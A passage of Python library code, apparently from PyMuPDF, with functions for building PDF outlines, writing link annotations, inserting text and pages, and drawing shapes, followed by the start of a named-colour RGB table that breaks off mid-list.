d_left, d_top = to
dest = str_goto % (xref, d_left, d_top, d_zoom)
return dest
if ddict["kind"] == LINK_URI:
dest = str_uri % (get_pdf_str(ddict["uri"]),)
return dest
if ddict["kind"] == LINK_LAUNCH:
fspec = get_pdf_str(ddict["file"])
dest = str_launch % (fspec, fspec)
return dest
if ddict["kind"] == LINK_GOTOR and ddict["page"] < 0:
fspec = get_pdf_str(ddict["file"])
dest = str_gotor2 % (get_pdf_str(ddict["to"]), fspec, fspec)
return dest
if ddict["kind"] == LINK_GOTOR and ddict["page"] >= 0:
fspec = get_pdf_str(ddict["file"])
dest = str_gotor1 % (
ddict["page"],
ddict["to"].x,
ddict["to"].y,
ddict["zoom"],
fspec,
fspec,
)
return dest
return ""
def set_toc(
doc: Document,
toc: list,
collapse: int = 1,
) -> int:
"""Create new outline tree (table of contents, TOC).
Args:
toc: (list, tuple) each entry must contain level, title, page and
optionally top margin on the page. None or '()' remove the TOC.
collapse: (int) collapses entries beyond this level. Zero or None
shows all entries unfolded.
Returns:
the number of inserted items, or the number of removed items respectively.
"""
if doc.is_closed or doc.is_encrypted:
raise ValueError("document closed or encrypted")
if not doc.is_pdf:
raise ValueError("is no PDF")
if not toc: # remove all entries
return len(doc._delToC())
# validity checks --------------------------------------------------------
if type(toc) not in (list, tuple):
raise ValueError("'toc' must be list or tuple")
toclen = len(toc)
page_count = doc.page_count
t0 = toc[0]
if type(t0) not in (list, tuple):
raise ValueError("items must be sequences of 3 or 4 items")
if t0[0] != 1:
raise ValueError("hierarchy level of item 0 must be 1")
for i in list(range(toclen - 1)):
t1 = toc[i]
t2 = toc[i + 1]
if not -1 <= t1[2] <= page_count:
raise ValueError("row %i: page number out of range" % i)
if (type(t2) not in (list, tuple)) or len(t2) not in (3, 4):
raise ValueError("bad row %i" % (i + 1))
if (type(t2[0]) is not int) or t2[0] < 1:
raise ValueError("bad hierarchy level in row %i" % (i + 1))
if t2[0] > t1[0] + 1:
raise ValueError("bad hierarchy level in row %i" % (i + 1))
# no formal errors in toc --------------------------------------------------
# --------------------------------------------------------------------------
# make a list of xref numbers, which we can use for our TOC entries
# --------------------------------------------------------------------------
old_xrefs = doc._delToC() # del old outlines, get their xref numbers
# prepare table of xrefs for new bookmarks
old_xrefs = []
xref = [0] + old_xrefs
xref[0] = doc._getOLRootNumber() # entry zero is outline root xref number
if toclen > len(old_xrefs): # too few old xrefs?
for i in range((toclen - len(old_xrefs))):
xref.append(doc.get_new_xref()) # acquire new ones
lvltab = {0: 0} # to store last entry per hierarchy level
# ------------------------------------------------------------------------------
# contains new outline objects as strings - first one is the outline root
# ------------------------------------------------------------------------------
olitems = [{"count": 0, "first": -1, "last": -1, "xref": xref[0]}]
# ------------------------------------------------------------------------------
# build olitems as a list of PDF-like connnected dictionaries
# ------------------------------------------------------------------------------
for i in range(toclen):
o = toc[i]
lvl = o[0] # level
title = get_pdf_str(o[1]) # title
pno = min(doc.page_count - 1, max(0, o[2] - 1)) # page number
page_xref = doc.page_xref(pno)
page_height = doc.page_cropbox(pno).height
top = Point(72, page_height - 36)
dest_dict = {"to": top, "kind": LINK_GOTO} # fall back target
if o[2] < 0:
dest_dict["kind"] = LINK_NONE
if len(o) > 3: # some target is specified
if type(o[3]) in (int, float): # convert a number to a point
dest_dict["to"] = Point(72, page_height - o[3])
else: # if something else, make sure we have a dict
dest_dict = o[3] if type(o[3]) is dict else dest_dict
if "to" not in dest_dict: # target point not in dict?
dest_dict["to"] = top # put default in
else: # transform target to PDF coordinates
point = +dest_dict["to"]
point.y = page_height - point.y
dest_dict["to"] = point
d = {}
d["first"] = -1
d["count"] = 0
d["last"] = -1
d["prev"] = -1
d["next"] = -1
d["dest"] = getDestStr(page_xref, dest_dict)
d["top"] = dest_dict["to"]
d["title"] = title
d["parent"] = lvltab[lvl - 1]
d["xref"] = xref[i + 1]
d["color"] = dest_dict.get("color")
d["flags"] = dest_dict.get("italic", 0) + 2 * dest_dict.get("bold", 0)
lvltab[lvl] = i + 1
parent = olitems[lvltab[lvl - 1]] # the parent entry
if (
dest_dict.get("collapse") or collapse and lvl > collapse
): # suppress expansion
parent["count"] -= 1 # make /Count negative
else:
parent["count"] += 1 # positive /Count
if parent["first"] == -1:
parent["first"] = i + 1
parent["last"] = i + 1
else:
d["prev"] = parent["last"]
prev = olitems[parent["last"]]
prev["next"] = i + 1
parent["last"] = i + 1
olitems.append(d)
# ------------------------------------------------------------------------------
# now create each outline item as a string and insert it in the PDF
# ------------------------------------------------------------------------------
for i, ol in enumerate(olitems):
txt = "<<"
if ol["count"] != 0:
txt += "/Count %i" % ol["count"]
try:
txt += ol["dest"]
except:
pass
try:
if ol["first"] > -1:
txt += "/First %i 0 R" % xref[ol["first"]]
except:
pass
try:
if ol["last"] > -1:
txt += "/Last %i 0 R" % xref[ol["last"]]
except:
pass
try:
if ol["next"] > -1:
txt += "/Next %i 0 R" % xref[ol["next"]]
except:
pass
try:
if ol["parent"] > -1:
txt += "/Parent %i 0 R" % xref[ol["parent"]]
except:
pass
try:
if ol["prev"] > -1:
txt += "/Prev %i 0 R" % xref[ol["prev"]]
except:
pass
try:
txt += "/Title" + ol["title"]
except:
pass
if ol.get("color") and len(ol["color"]) == 3:
txt += "/C[ %g %g %g]" % tuple(ol["color"])
if ol.get("flags", 0) > 0:
txt += "/F %i" % ol["flags"]
if i == 0: # special: this is the outline root
txt += "/Type/Outlines" # so add the /Type entry
txt += ">>"
doc.update_object(xref[i], txt) # insert the PDF object
doc.init_doc()
return toclen
def do_links(
doc1: Document,
doc2: Document,
from_page: int = -1,
to_page: int = -1,
start_at: int = -1,
) -> None:
"""Insert links contained in copied page range into destination PDF.
Parameter values **must** equal those of method insert_pdf(), which must
have been previously executed.
"""
# --------------------------------------------------------------------------
# internal function to create the actual "/Annots" object string
# --------------------------------------------------------------------------
def cre_annot(lnk, xref_dst, pno_src, ctm):
"""Create annotation object string for a passed-in link."""
r = lnk["from"] * ctm # rect in PDF coordinates
rect = "%g %g %g %g" % tuple(r)
if lnk["kind"] == LINK_GOTO:
txt = annot_skel["goto1"] # annot_goto
idx = pno_src.index(lnk["page"])
p = lnk["to"] * ctm # target point in PDF coordinates
annot = txt % (xref_dst[idx], p.x, p.y, lnk["zoom"], rect)
elif lnk["kind"] == LINK_GOTOR:
if lnk["page"] >= 0:
txt = annot_skel["gotor1"] # annot_gotor
pnt = lnk.get("to", Point(0, 0)) # destination point
if type(pnt) is not Point:
pnt = Point(0, 0)
annot = txt % (
lnk["page"],
pnt.x,
pnt.y,
lnk["zoom"],
lnk["file"],
lnk["file"],
rect,
)
else:
txt = annot_skel["gotor2"] # annot_gotor_n
to = get_pdf_str(lnk["to"])
to = to[1:-1]
f = lnk["file"]
annot = txt % (to, f, rect)
elif lnk["kind"] == LINK_LAUNCH:
txt = annot_skel["launch"] # annot_launch
annot = txt % (lnk["file"], lnk["file"], rect)
elif lnk["kind"] == LINK_URI:
txt = annot_skel["uri"] # annot_uri
annot = txt % (lnk["uri"], rect)
else:
annot = ""
return annot
# --------------------------------------------------------------------------
# validate & normalize parameters
if from_page < 0:
fp = 0
elif from_page >= doc2.page_count:
fp = doc2.page_count - 1
else:
fp = from_page
if to_page < 0 or to_page >= doc2.page_count:
tp = doc2.page_count - 1
else:
tp = to_page
if start_at < 0:
raise ValueError("'start_at' must be >= 0")
sa = start_at
incr = 1 if fp <= tp else -1 # page range could be reversed
# lists of source / destination page numbers
pno_src = list(range(fp, tp + incr, incr))
pno_dst = [sa + i for i in range(len(pno_src))]
# lists of source / destination page xrefs
xref_src = []
xref_dst = []
for i in range(len(pno_src)):
p_src = pno_src[i]
p_dst = pno_dst[i]
old_xref = doc2.page_xref(p_src)
new_xref = doc1.page_xref(p_dst)
xref_src.append(old_xref)
xref_dst.append(new_xref)
# create the links for each copied page in destination PDF
for i in range(len(xref_src)):
page_src = doc2[pno_src[i]] # load source page
links = page_src.get_links() # get all its links
if len(links) == 0: # no links there
page_src = None
continue
ctm = ~page_src.transformation_matrix # calc page transformation matrix
page_dst = doc1[pno_dst[i]] # load destination page
link_tab = [] # store all link definitions here
for l in links:
if l["kind"] == LINK_GOTO and (l["page"] not in pno_src):
continue # GOTO link target not in copied pages
annot_text = cre_annot(l, xref_dst, pno_src, ctm)
if annot_text:
link_tab.append(annot_text)
if link_tab != []:
page_dst._addAnnot_FromString(tuple(link_tab))
return
def getLinkText(page: Page, lnk: dict) -> str:
# --------------------------------------------------------------------------
# define skeletons for /Annots object texts
# --------------------------------------------------------------------------
ctm = page.transformation_matrix
ictm = ~ctm
r = lnk["from"]
rect = "%g %g %g %g" % tuple(r * ictm)
annot = ""
if lnk["kind"] == LINK_GOTO:
if lnk["page"] >= 0:
txt = annot_skel["goto1"] # annot_goto
pno = lnk["page"]
xref = page.parent.page_xref(pno)
pnt = lnk.get("to", Point(0, 0)) # destination point
ipnt = pnt * ictm
annot = txt % (xref, ipnt.x, ipnt.y, lnk.get("zoom", 0), rect)
else:
txt = annot_skel["goto2"] # annot_goto_n
annot = txt % (get_pdf_str(lnk["to"]), rect)
elif lnk["kind"] == LINK_GOTOR:
if lnk["page"] >= 0:
txt = annot_skel["gotor1"] # annot_gotor
pnt = lnk.get("to", Point(0, 0)) # destination point
if type(pnt) is not Point:
pnt = Point(0, 0)
annot = txt % (
lnk["page"],
pnt.x,
pnt.y,
lnk.get("zoom", 0),
lnk["file"],
lnk["file"],
rect,
)
else:
txt = annot_skel["gotor2"] # annot_gotor_n
annot = txt % (get_pdf_str(lnk["to"]), lnk["file"], rect)
elif lnk["kind"] == LINK_LAUNCH:
txt = annot_skel["launch"] # annot_launch
annot = txt % (lnk["file"], lnk["file"], rect)
elif lnk["kind"] == LINK_URI:
txt = annot_skel["uri"] # txt = annot_uri
annot = txt % (lnk["uri"], rect)
elif lnk["kind"] == LINK_NAMED:
txt = annot_skel["named"] # annot_named
annot = txt % (lnk["name"], rect)
if not annot:
return annot
# add a /NM PDF key to the object definition
link_names = dict( # existing ids and their xref
[(x[0], x[2]) for x in page.annot_xrefs() if x[1] == PDF_ANNOT_LINK]
)
old_name = lnk.get("id", "") # id value in the argument
if old_name and (lnk["xref"], old_name) in link_names.items():
name = old_name # no new name if this is an update only
else:
i = 0
stem = TOOLS.set_annot_stem() + "-L%i"
while True:
name = stem % i
if name not in link_names.values():
break
i += 1
# add /NM key to object definition
annot = annot.replace("/Link", "/Link/NM(%s)" % name)
return annot
def delete_widget(page: Page, widget: Widget) -> Widget:
"""Delete widget from page and return the next one."""
CheckParent(page)
annot = getattr(widget, "_annot", None)
if annot is None:
raise ValueError("bad type: widget")
nextwidget = widget.next
page.delete_annot(annot)
widget._annot.__del__()
widget._annot.parent = None
keylist = list(widget.__dict__.keys())
for key in keylist:
del widget.__dict__[key]
return nextwidget
def update_link(page: Page, lnk: dict) -> None:
"""Update a link on the current page."""
CheckParent(page)
annot = getLinkText(page, lnk)
if annot == "":
raise ValueError("link kind not supported")
page.parent.update_object(lnk["xref"], annot, page=page)
return
def insert_link(page: Page, lnk: dict, mark: bool = True) -> None:
"""Insert a new link for the current page."""
CheckParent(page)
annot = getLinkText(page, lnk)
if annot == "":
raise ValueError("link kind not supported")
page._addAnnot_FromString((annot,))
return
def insert_textbox(
page: Page,
rect: rect_like,
buffer: typing.Union[str, list],
fontname: str = "helv",
fontfile: OptStr = None,
set_simple: int = 0,
encoding: int = 0,
fontsize: float = 11,
lineheight: OptFloat = None,
color: OptSeq = None,
fill: OptSeq = None,
expandtabs: int = 1,
align: int = 0,
rotate: int = 0,
render_mode: int = 0,
border_width: float = 0.05,
morph: OptSeq = None,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> float:
"""Insert text into a given rectangle.
Notes:
Creates a Shape object, uses its same-named method and commits it.
Parameters:
rect: (rect-like) area to use for text.
buffer: text to be inserted
fontname: a Base-14 font, font name or '/name'
fontfile: name of a font file
fontsize: font size
lineheight: overwrite the font property
color: RGB color triple
expandtabs: handles tabulators with string function
align: left, center, right, justified
rotate: 0, 90, 180, or 270 degrees
morph: morph box with a matrix and a fixpoint
overlay: put text in foreground or background
Returns:
unused or deficit rectangle area (float)
"""
img = page.new_shape()
rc = img.insert_textbox(
rect,
buffer,
fontsize=fontsize,
lineheight=lineheight,
fontname=fontname,
fontfile=fontfile,
set_simple=set_simple,
encoding=encoding,
color=color,
fill=fill,
expandtabs=expandtabs,
render_mode=render_mode,
border_width=border_width,
align=align,
rotate=rotate,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
if rc >= 0:
img.commit(overlay)
return rc
def insert_text(
page: Page,
point: point_like,
text: typing.Union[str, list],
fontsize: float = 11,
lineheight: OptFloat = None,
fontname: str = "helv",
fontfile: OptStr = None,
set_simple: int = 0,
encoding: int = 0,
color: OptSeq = None,
fill: OptSeq = None,
border_width: float = 0.05,
render_mode: int = 0,
rotate: int = 0,
morph: OptSeq = None,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
):
img = page.new_shape()
rc = img.insert_text(
point,
text,
fontsize=fontsize,
lineheight=lineheight,
fontname=fontname,
fontfile=fontfile,
set_simple=set_simple,
encoding=encoding,
color=color,
fill=fill,
border_width=border_width,
render_mode=render_mode,
rotate=rotate,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
if rc >= 0:
img.commit(overlay)
return rc
def new_page(
doc: Document,
pno: int = -1,
width: float = 595,
height: float = 842,
) -> Page:
"""Create and return a new page object.
Args:
pno: (int) insert before this page. Default: after last page.
width: (float) page width in points. Default: 595 (ISO A4 width).
height: (float) page height in points. Default 842 (ISO A4 height).
Returns:
A Page object.
"""
doc._newPage(pno, width=width, height=height)
return doc[pno]
def insert_page(
doc: Document,
pno: int,
text: typing.Union[str, list, None] = None,
fontsize: float = 11,
width: float = 595,
height: float = 842,
fontname: str = "helv",
fontfile: OptStr = None,
color: OptSeq = (0,),
) -> int:
"""Create a new PDF page and insert some text.
Notes:
Function combining Document.new_page() and Page.insert_text().
For parameter details see these methods.
"""
page = doc.new_page(pno=pno, width=width, height=height)
if not bool(text):
return 0
rc = page.insert_text(
(50, 72),
text,
fontsize=fontsize,
fontname=fontname,
fontfile=fontfile,
color=color,
)
return rc
def draw_line(
page: Page,
p1: point_like,
p2: point_like,
color: OptSeq = (0,),
dashes: OptStr = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
morph: OptSeq = None,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc=0,
) -> Point:
"""Draw a line from point p1 to point p2."""
img = page.new_shape()
p = img.draw_line(Point(p1), Point(p2))
img.finish(
color=color,
dashes=dashes,
width=width,
closePath=False,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return p
def draw_squiggle(
page: Page,
p1: point_like,
p2: point_like,
breadth: float = 2,
color: OptSeq = (0,),
dashes: OptStr = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
morph: OptSeq = None,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a squiggly line from point p1 to point p2."""
img = page.new_shape()
p = img.draw_squiggle(Point(p1), Point(p2), breadth=breadth)
img.finish(
color=color,
dashes=dashes,
width=width,
closePath=False,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return p
def draw_zigzag(
page: Page,
p1: point_like,
p2: point_like,
breadth: float = 2,
color: OptSeq = (0,),
dashes: OptStr = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
morph: OptSeq = None,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a zigzag line from point p1 to point p2."""
img = page.new_shape()
p = img.draw_zigzag(Point(p1), Point(p2), breadth=breadth)
img.finish(
color=color,
dashes=dashes,
width=width,
closePath=False,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return p
def draw_rect(
page: Page,
rect: rect_like,
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
morph: OptSeq = None,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
radius=None,
) -> Point:
"""Draw a rectangle. See Shape class method for details."""
img = page.new_shape()
Q = img.draw_rect(Rect(rect), radius=radius)
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_quad(
page: Page,
quad: quad_like,
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
morph: OptSeq = None,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a quadrilateral."""
img = page.new_shape()
Q = img.draw_quad(Quad(quad))
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_polyline(
page: Page,
points: list,
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
width: float = 1,
morph: OptSeq = None,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
closePath: bool = False,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw multiple connected line segments."""
img = page.new_shape()
Q = img.draw_polyline(points)
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
closePath=closePath,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_circle(
page: Page,
center: point_like,
radius: float,
color: OptSeq = (0,),
fill: OptSeq = None,
morph: OptSeq = None,
dashes: OptStr = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a circle given its center and radius."""
img = page.new_shape()
Q = img.draw_circle(Point(center), radius)
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_oval(
page: Page,
rect: typing.Union[rect_like, quad_like],
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
morph: OptSeq = None,
width: float = 1,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw an oval given its containing rectangle or quad."""
img = page.new_shape()
Q = img.draw_oval(rect)
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_curve(
page: Page,
p1: point_like,
p2: point_like,
p3: point_like,
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
width: float = 1,
morph: OptSeq = None,
closePath: bool = False,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a special Bezier curve from p1 to p3, generating control points on lines p1 to p2 and p2 to p3."""
img = page.new_shape()
Q = img.draw_curve(Point(p1), Point(p2), Point(p3))
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
closePath=closePath,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_bezier(
page: Page,
p1: point_like,
p2: point_like,
p3: point_like,
p4: point_like,
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
width: float = 1,
morph: OptStr = None,
closePath: bool = False,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a general cubic Bezier curve from p1 to p4 using control points p2 and p3."""
img = page.new_shape()
Q = img.draw_bezier(Point(p1), Point(p2), Point(p3), Point(p4))
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
closePath=closePath,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
def draw_sector(
page: Page,
center: point_like,
point: point_like,
beta: float,
color: OptSeq = (0,),
fill: OptSeq = None,
dashes: OptStr = None,
fullSector: bool = True,
morph: OptSeq = None,
width: float = 1,
closePath: bool = False,
lineCap: int = 0,
lineJoin: int = 0,
overlay: bool = True,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> Point:
"""Draw a circle sector given circle center, one arc end point and the angle of the arc.
Parameters:
center -- center of circle
point -- arc end point
beta -- angle of arc (degrees)
fullSector -- connect arc ends with center
"""
img = page.new_shape()
Q = img.draw_sector(Point(center), Point(point), beta, fullSector=fullSector)
img.finish(
color=color,
fill=fill,
dashes=dashes,
width=width,
lineCap=lineCap,
lineJoin=lineJoin,
morph=morph,
closePath=closePath,
stroke_opacity=stroke_opacity,
fill_opacity=fill_opacity,
oc=oc,
)
img.commit(overlay)
return Q
# ----------------------------------------------------------------------
# Name: wx.lib.colourdb.py
# Purpose: Adds a bunch of colour names and RGB values to the
# colour database so they can be found by name
#
# Author: Robin Dunn
#
# Created: 13-March-2001
# Copyright: (c) 2001-2017 by Total Control Software
# Licence: wxWindows license
# Tags: phoenix-port, unittest, documented
# ----------------------------------------------------------------------
def getColorList() -> list:
"""
Returns a list of just the colour names used by this module.
:rtype: list of strings
"""
return [x[0] for x in getColorInfoList()]
def getColorInfoList() -> list:
"""
Returns the list of colour name/value tuples used by this module.
:rtype: list of tuples
"""
return [
("ALICEBLUE", 240, 248, 255),
("ANTIQUEWHITE", 250, 235, 215),
("ANTIQUEWHITE1", 255, 239, 219),
("ANTIQUEWHITE2", 238, 223, 204),
("ANTIQUEWHITE3", 205, 192, 176),
("ANTIQUEWHITE4", 139, 131, 120),
("AQUAMARINE", 127, 255, 212),
("AQUAMARINE1", 127, 255, 212),
("AQUAMARINE2", 118, 238, 198),
("AQUAMARINE3", 102, 205, 170),
("AQUAMARINE4", 69, 139, 116),
("AZURE", 240, 255, 255),
("AZURE1", 240, 255, 255),
("AZURE2", 224, 238, 238),
("AZURE3", 193, 205, 205),
("AZURE4", 131, 139, 139),
("BEIGE", 245, 245, 220),
("BISQUE", 255, 228, 196),
("BISQUE1", 255, 228, 196),
("BISQUE2", 238, 213, 183),
("BISQUE3", 205, 183, 158),
("BISQUE4", 139, 125, 107),
("BLACK", 0, 0, 0),
("BLANCHEDALMOND", 255, 235, 205),
("BLUE", 0, 0, 255),
("BLUE1", 0, 0, 255),
("BLUE2", 0, 0, 238),
("BLUE3", 0, 0, 205),
("BLUE4", 0, 0, 139),
("BLUEVIOLET", 138, 43, 226),
("BROWN", 165, 42, 42),
("BROWN1", 255, 64, 64),
("BROWN2", 238, 59, 59),
("BROWN3", 205, 51, 51),
("BROWN4", 139, 35, 35),
("BURLYWOOD", 222, 184, 135),
("BURLYWOOD1", 255, 211, 155),
("BURLYWOOD2", 238, 197, 145),
("BURLYWOOD3", 205, 170, 125),
("BURLYWOOD4", 139, 115, 85),
("CADETBLUE", 95, 158, 160),
("CADETBLUE1", 152, 245, 255),
("CADETBLUE2", 142, 229, 238),
("CADETBLUE3", 122, 197, 205),
("CADETBLUE4", 83, 134, 139),
("CHARTREUSE", 127, 255, 0),
("CHARTREUSE1", 127, 255, 0),
("CHARTREUSE2", 118, 238, 0),
("CHARTREUSE3", 102, 205, 0),
("CHARTREUSE4", 69, 139, 0),
("CHOCOLATE", 210, 105, 30),
("CHOCOLATE1", 255, 127, 36),
("CHOCOLATE2", 238, 118, 33),
("CHOCOLATE3", 205, 102, 29),
("CHOCOLATE4", 139, 69, 19),
("COFFEE", 156, 79, 0),
("CORAL", 255, 127, 80),
("CORAL1", 255, 114, 86),
("CORAL2", 238, 106, 80),
("CORAL3", 205, 91, 69),
("CORAL4", 139, 62, 47),
("CORNFLOWERBLUE", 100, 149, 237),
("CORNSILK", 255, 248, 220),
("CORNSILK1", 255, 248, 220),
("CORNSILK2", 238, 232, 205),
("CORNSILK3", 205, 200, 177),
("CORNSILK4", 139, 136, 120),
("CYAN", 0, 255, 255),
("CYAN1", 0, 255, 255),
("CYAN2", 0, 238, 238),
("CYAN3", 0, 205, 205),
("CYAN4", 0, 139, 139),
("DARKBLUE", 0, 0, 139),
("DARKCYAN", 0, 139, 139),
("DARKGOLDENROD", 184, 134, 11),
("DARKGOLDENROD1", 255, 185, 15),
("DARKGOLDENROD2", 238, 173, 14),
("DARKGOLDENROD3", 205, 149, 12),
("DARKGOLDENROD4", 139, 101, 8),
("DARKGREEN", 0, 100, 0),
("DARKGRAY", 169, 169, 169),
("DARKKHAKI", 189, 183, 107),
("DARKMAGENTA", 139, 0, 139),
("DARKOLIVEGREEN", 85, 107, 47),
("DARKOLIVEGREEN1", 202, 255, 112),
("DARKOLIVEGREEN2", 188, 238, 104),
("DARKOLIVEGREEN3", 162, 205, 90),
("DARKOLIVEGREEN4", 110, 139, 61),
("DARKORANGE", 255, 140, 0),
("DARKORANGE1", 255, 127, 0),
("DARKORANGE2", 238, 118, 0),
("DARKORANGE3", 205, 102, 0),
("DARKORANGE4", 139, 69, 0),
("DARKORCHID", 153, 50, 204),
("DARKORCHID1", 191, 62, 255),
("DARKORCHID2", 178, 58, 238),
("DARKORCHID3", 154, 50, 205),
("DARKORCHID4", 104, 34, 139),
("DARKRED", 139, 0, 0),
("DARKSALMON", 233, 150, 122),
("DARKSEAGREEN", 143, 188, 143),
("DARKSEAGREEN1", 193, 255, 193),
("DARKSEAGREEN2", 180, 238, 180),
("DARKSEAGREEN3", 155, 205, 155),
("DARKSEAGREEN4", 105, 139, 105),
("DARKSLATEBLUE", 72, 61, 139),
("DARKSLATEGRAY", 47, 79, 79),
("DARKTURQUOISE", 0, 206, 209),
("DARKVIOLET", 148, 0, 211),
("DEEPPINK", 255, 20, 147),
("DEEPPINK1", 255, 20, 147),
("DEEPPINK2", 238, 18, 137),
("DEEPPINK3", 205, 16, 118),
("DEEPPINK4", 139, 10, 80),
("DEEPSKYBLUE", 0, 191, 255),
("DEEPSKYBLUE1", 0, 191, 255),
("DEEPSKYBLUE2", 0, 178, 238),
("DEEPSKYBLUE3", 0, 154, 205),
("DEEPSKYBLUE4", 0, 104, 139),
("DIMGRAY", 105, 105, 105),
("DODGERBLUE", 30, 144, 255),
("DODGERBLUE1", 30, 144, 255),
("DODGERBLUE2", 28, 134, 238),
("DODGERBLUE3", 24, 116, 205),
("DODGERBLUE4", 16, 78, 139),
("FIREBRICK", 178, 34, 34),
("FIREBRICK1", 255, 48, 48),
("FIREBRICK2", 238, 44, 44),
("FIREBRICK3", 205, 38, 38),
("FIREBRICK4", 139, 26, 26),
("FLORALWHITE", 255, 250, 240),
("FORESTGREEN", 34, 139, 34),
("GAINSBORO", 220, 220, 220),
("GHOSTWHITE", 248, 248, 255),
("GOLD", 255, 215, 0),
("GOLD1", 255, 215, 0),
("GOLD2", 238, 201, 0),
("GOLD3", 205, 173, 0),
("GOLD4", 139, 117, 0),
("GOLDENROD", 218, 165, 32),
("GOLDENROD1", 255, 193, 37),
("GOLDENROD2", 238, 180, 34),
("GOLDENROD3", 205, 155, 29),
("GOLDENROD4", 139, 105, 20),
("GREEN YELLOW", 173, 255, 47),
("GREEN", 0, 255, 0),
("GREEN1", 0, 255, 0),
("GREEN2", 0, 238, 0),
("GREEN3", 0, 205, 0),
("GREEN4", 0, 139, 0),
("GREENYELLOW", 173, 255, 47),
("GRAY", 190, 190, 190),
("GRAY0", 0, 0, 0),
("GRAY1", 3, 3, 3),
("GRAY10", 26, 26, 26),
("GRAY100", 255, 255, 255),
("GRAY11", 28, 28, 28),
("GRAY12", 31, 31, 31),
("GRAY13", 33, 33, 33),
("GRAY14", 36, 36, 36),
("GRAY15", 38, 38, 38),
("GRAY16", 41, 41, 41),
("GRAY17", 43, 43, 43),
("GRAY18", 46, 46, 46),
("GRAY19", 48, 48, 48),
("GRAY2", 5, 5, 5),
("GRAY20", 51, 51, 51),
("GRAY21", 54, 54, 54),
("GRAY22", 56, 56, 56),
("GRAY23", 59, 59, 59),
("GRAY24", 61, 61, 61),
("GRAY25", 64, 64, 64),
("GRAY26", 66, 66, 66),
("GRAY27", 69, 69, 69),
("GRAY28", 71, 71, 71),
("GRAY29", 74, 74, 74),
("GRAY3", 8, 8, 8),
("GRAY30", 77, 77, 77),
("GRAY31", 79, 79, 79),
("GRAY32", 82, 82, 82),
("GRAY33", 84, 84, 84),
("GRAY34", 87, 87, 87),
("GRAY35", 89, 89, 89),
("GRAY36", 92, 92, 92),
("GRAY37", 94, 94, 94),
("GRAY38", 97, 97, 97),
